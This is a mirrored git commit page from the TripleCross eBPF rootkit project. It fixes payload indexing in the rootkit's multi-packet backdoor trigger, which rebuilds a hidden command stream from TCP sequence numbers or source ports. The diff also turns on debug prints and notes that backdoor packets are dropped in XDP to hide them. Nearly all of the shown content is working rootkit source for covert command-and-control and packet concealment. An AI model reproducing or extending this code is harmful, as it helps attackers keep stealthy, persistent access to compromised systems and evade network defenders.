mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-17 07:33:07 +08:00
Fixed a bug where tcpport mode in the multi-packet backdoor did not work if a previous trigger using seqnum mode was made
This commit is contained in:
h3xduck
Binary file not shown.
24923
src/.output/kit.skel.h
24923
src/.output/kit.skel.h
File diff suppressed because it is too large
Load Diff
BIN
src/bin/kit
BIN
src/bin/kit
Binary file not shown.
@@ -201,32 +201,33 @@ static __always_inline int manage_backdoor_trigger_v3_32(struct backdoor_packet_
|
|||||||
//The following routine (not just the next check) is necessarily dirty in terms of programming,
|
//The following routine (not just the next check) is necessarily dirty in terms of programming,
|
||||||
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
||||||
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM] = {0};
|
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SEQ_NUM] = {0};
|
||||||
|
int p_index = 0;
|
||||||
if(first_packet == 0){
|
if(first_packet == 0){
|
||||||
for(int ii=first_packet; ii<3; ii++){
|
for(int ii=first_packet; ii<3; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 1){
|
}else if(first_packet == 1){
|
||||||
for(int ii=first_packet; ii<3; ii++){
|
for(int ii=first_packet; ii<3; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 2){
|
}else if(first_packet == 2){
|
||||||
for(int ii=first_packet; ii<3; ii++){
|
for(int ii=first_packet; ii<3; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
__u32 seq_num = b_data.trigger_array[ii].seq_raw;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*ii), &(seq_num), sizeof(__u32));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SEQ_NUM*p_index), &(seq_num), sizeof(__u32));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -321,71 +322,72 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
|
|||||||
}else{
|
}else{
|
||||||
first_packet = 0;
|
first_packet = 0;
|
||||||
}
|
}
|
||||||
|
bpf_printk("BACKDOOR 16: FP:%i, LR:%i\n", first_packet, last_received);
|
||||||
//The following routine is necessarily dirty in terms of programming,
|
//The following routine is necessarily dirty in terms of programming,
|
||||||
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
//but the ebpf verifier strongly dislikes MOD operations (check report, screenshot)
|
||||||
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT] = {0};
|
char payload[CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT] = {0};
|
||||||
|
int p_index = 0;
|
||||||
if(first_packet == 0){
|
if(first_packet == 0){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 1){
|
}else if(first_packet == 1){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 2){
|
}else if(first_packet == 2){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 3){
|
}else if(first_packet == 3){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 4){
|
}else if(first_packet == 4){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}else if(first_packet == 5){
|
}else if(first_packet == 5){
|
||||||
for(int ii=first_packet; ii<6; ii++){
|
for(int ii=first_packet; ii<6; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
for(int ii=0; ii<first_packet; ii++){
|
for(int ii=0; ii<first_packet; ii++, p_index++){
|
||||||
__u16 src_port = b_data.trigger_array[ii].src_port;
|
__u16 src_port = b_data.trigger_array[ii].src_port;
|
||||||
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*ii), &(src_port), sizeof(__u16));
|
__builtin_memcpy(payload+(CC_STREAM_TRIGGER_PACKET_CAPACITY_BYTES_MODE_SRC_PORT*p_index), &(src_port), sizeof(__u16));
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/*bpf_printk("Payload before XOR: ");
|
bpf_printk("Payload before XOR: ");
|
||||||
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
||||||
bpf_printk("%x", payload[ii]);
|
bpf_printk("%x", payload[ii]);
|
||||||
}
|
}
|
||||||
bpf_printk("\n");*/
|
bpf_printk("\n");
|
||||||
|
|
||||||
//Now that we have the possible complete stream, let's search for the secret backdoor combination in it
|
//Now that we have the possible complete stream, let's search for the secret backdoor combination in it
|
||||||
//First undo running XOR
|
//First undo running XOR
|
||||||
@@ -394,11 +396,11 @@ static __always_inline int manage_backdoor_trigger_v3_16(struct backdoor_packet_
|
|||||||
__builtin_memcpy(payload+ii, (char*)&(xor_res), 0x01);
|
__builtin_memcpy(payload+ii, (char*)&(xor_res), 0x01);
|
||||||
}
|
}
|
||||||
|
|
||||||
/*bpf_printk("Payload after XOR: ");
|
bpf_printk("Payload after XOR: ");
|
||||||
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
for(int ii=0; ii<CC_STREAM_TRIGGER_PAYLOAD_LEN_MODE_SRC_PORT; ii++){
|
||||||
bpf_printk("%x", payload[ii]);
|
bpf_printk("%x", payload[ii]);
|
||||||
}
|
}
|
||||||
bpf_printk("\n");*/
|
bpf_printk("\n");
|
||||||
|
|
||||||
//Now compute CRC
|
//Now compute CRC
|
||||||
__u8 x;
|
__u8 x;
|
||||||
|
|||||||
@@ -214,6 +214,7 @@ int xdp_receive(struct xdp_md *ctx){
|
|||||||
//where for other purpose, we must still check it)
|
//where for other purpose, we must still check it)
|
||||||
int ret = manage_backdoor_trigger_v3_32(b_new_data_32);
|
int ret = manage_backdoor_trigger_v3_32(b_new_data_32);
|
||||||
if(ret == 1){
|
if(ret == 1){
|
||||||
|
//The packet was for the backdoor, better hide it
|
||||||
return XDP_DROP;
|
return XDP_DROP;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -227,7 +228,6 @@ int xdp_receive(struct xdp_md *ctx){
|
|||||||
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
|
bpf_map_update_elem(&backdoor_packet_log_32, &ipvalue, &b_new_data_32, BPF_ANY);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
////16 bit 6-len streams
|
////16 bit 6-len streams
|
||||||
struct backdoor_packet_log_data_16 *b_data_16 = (struct backdoor_packet_log_data_16*) bpf_map_lookup_elem(&backdoor_packet_log_16, &ipvalue);
|
struct backdoor_packet_log_data_16 *b_data_16 = (struct backdoor_packet_log_data_16*) bpf_map_lookup_elem(&backdoor_packet_log_16, &ipvalue);
|
||||||
struct backdoor_packet_log_data_16 b_new_data_16 = {0};
|
struct backdoor_packet_log_data_16 b_new_data_16 = {0};
|
||||||
|
|||||||
Reference in New Issue
Block a user